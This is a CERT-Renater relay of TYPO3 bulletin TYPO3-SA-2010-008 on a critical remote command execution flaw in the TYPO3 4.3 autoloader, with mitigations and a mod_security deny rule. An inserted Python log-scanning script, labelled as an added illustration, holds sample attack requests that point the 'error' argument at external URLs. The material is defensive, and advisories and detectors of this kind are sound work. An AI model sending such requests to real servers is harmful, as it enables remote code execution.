=====================================================================
                                   CERT-Renater

                        Note d'Information No. 2010/VULN120
_____________________________________________________________________

DATE                      : 09/04/2010

HARDWARE PLATFORM(S)      : /

OPERATING SYSTEM(S)       : Systems running TYPO3 Core versions 4.3.0, 4.3.1, 4.3.2.

======================================================================
http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-008/
______________________________________________________________________

TYPO3 Security Bulletin TYPO3-SA-2010-008: Remote Command Execution in TYPO3 Core

Component Type: TYPO3 Core

Affected Versions: 4.3.0, 4.3.1 and 4.3.2 (+ development releases of 4.4 branch)

Vulnerability Types: Remote Command Execution

Overall Severity: Critical

Release Date: April 9, 2010

Vulnerable subcomponent: TYPO3 autoloader

Vulnerability Type: Remote Command Execution

Severity: Critical

Suggested CVSS v2.0: AV:N/AC:H/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C

Problem Description: The TYPO3 autoloader does not validate the arguments passed to it.

You are not vulnerable if at least one of the following conditions is met:

  - You are using any TYPO3 version other than 4.3.0, 4.3.1 or 4.3.2 (+ development
    releases of the 4.4 branch).
  - You have at least one of the following PHP configuration variables set to "off":
    register_globals ("off" by default; advised to be "off" in the TYPO3 Security
    Cookbook), allow_url_include ("off" by default) or allow_url_fopen ("on" by
    default).
  - You are using Suhosin and have not put URL schemes in the configuration variable
    "suhosin.executor.include.whitelist".

Possible Impact: A crafted request to a vulnerable TYPO3 installation allows an
attacker to load PHP code from an external server and execute it on the TYPO3
installation.

Solution: Choose one of the solutions below:

  - Update to TYPO3 version 4.3.3, which fixes the problem described.
  - Set at least one of the following PHP configuration variables to "off":
    register_globals, allow_url_include or allow_url_fopen.
  - Apply the patch that is linked below.
  - Replace all files that are part of the security fix by using the zip archive
    that is linked below.
  - Set up a mod_security rule:
      SecRule  ARGS:error  "^(https?|ftp)"  "deny"
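As an added, defender-side illustration that is not part of the bulletin nor of TYPO3's or mod_security's own code: a Python script that applies the bulletin's "not vulnerable" conditions to a dump of PHP directives, and mirrors the SecRule above against access-log lines to find requests whose "error" argument begins with a URL scheme. The sample log lines, the example.invalid hosts, the spellings accepted as "off" and the handling of 4.4 pre-release version strings are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Versions named in TYPO3-SA-2010-008; 4.4 pre-releases are handled by a prefix test.
AFFECTED = {"4.3.0", "4.3.1", "4.3.2"}
# Defaults as stated in the bulletin, used when a directive is absent from the dump.
PHP_DEFAULTS = {"register_globals": "off", "allow_url_include": "off", "allow_url_fopen": "on"}
OFF_VALUES = {"", "0", "off", "false", "no"}      # spellings php -i / ini_get may report (assumed)
REMOTE_SCHEMES = {"http", "https", "ftp"}         # the schemes the mod_security rule keys on

def config_mitigates(typo3_version, ini, suhosin_loaded=False):
    """True if at least one of the bulletin's 'not vulnerable' conditions holds.
    ini: dict of php.ini directive -> value as reported by the server."""
    ver = typo3_version.lower()
    # Assumption: a 4.4 version string carrying a pre-release tag counts as affected.
    prerelease_44 = ver.startswith("4.4") and any(t in ver for t in ("dev", "alpha", "beta", "rc"))
    if ver not in AFFECTED and not prerelease_44:
        return True
    for directive, default in PHP_DEFAULTS.items():
        if str(ini.get(directive, default)).strip().lower() in OFF_VALUES:
            return True
    if suhosin_loaded:                            # Suhosin present and no URL scheme whitelisted
        whitelist = str(ini.get("suhosin.executor.include.whitelist", ""))
        schemes = {s.strip().lower() for s in whitelist.split(",") if s.strip()}
        if not schemes & REMOTE_SCHEMES:
            return True
    return False

LOG_RE = re.compile(r'"(?:GET|POST) (?P<uri>\S+) HTTP/')   # request line of a combined-format log
ERROR_ARG_RE = re.compile(r"^(https?|ftp)", re.I)          # case-insensitive form of the SecRule pattern

def suspicious_requests(log_lines):
    """Return access-log lines whose 'error' query argument starts with a URL scheme.
    Only GET arguments are visible in a standard access log; POST bodies are not."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        args = parse_qs(urlsplit(m.group("uri")).query, keep_blank_values=True)
        if any(ERROR_ARG_RE.match(v) for v in args.get("error", [])):
            hits.append(line)
    return hits

# Constructed sample log lines (not taken from any real incident).
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Apr/2010:10:00:01 +0200] "GET /index.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Apr/2010:10:00:02 +0200] "GET /index.php?error=http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 310',
    '203.0.113.9 - - [09/Apr/2010:10:00:03 +0200] "GET /typo3/?error=ftp://example.invalid/y HTTP/1.1" 200 310',
    '203.0.113.9 - - [09/Apr/2010:10:00:04 +0200] "GET /index.php?error=oops HTTP/1.1" 200 310',
]
```

The log check only reproduces the GET side of the rule; a mod_security rule on ARGS also inspects POST bodies, which the access log does not record.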
Patch: Patch for TYPO3 version 4.3.x (md5 sum: 19fec0afa12e91152811d9c6e9c73cf1)

Files: Archive containing safe-to-use files (md5 sum: fb5e62007c20f8a03b06d1acab1f4c8e).
Extract the archive and replace the server files with those in the archive.
Note: We have been informed that this vulnerability has already been exploited.

Credits: Credits go to Christian Bülter and Bastian Heiser who discovered and reported
the issue and the Security Team members Dmitry Dulepov, Marcus Krause and Helmut Hummel
for providing the mod_security rule and the patch.

General Advice: Follow the recommendations that are given in the TYPO3 Security
Cookbook. Please subscribe to the typo3-announce mailing list.
======================================================================

          =========================================================
          Les serveurs de référence du CERT-Renater
          http://www.urec.fr/securite
          http://www.cru.fr/securite
          http://www.renater.fr
          =========================================================
          + CERT-RENATER          | tel : 01-53-94-20-44          +
          + 151 bd de l'Hopital   | fax : 01-53-94-20-41          +
          + 75013 Paris           | email: certsvp@renater.fr     +
          =========================================================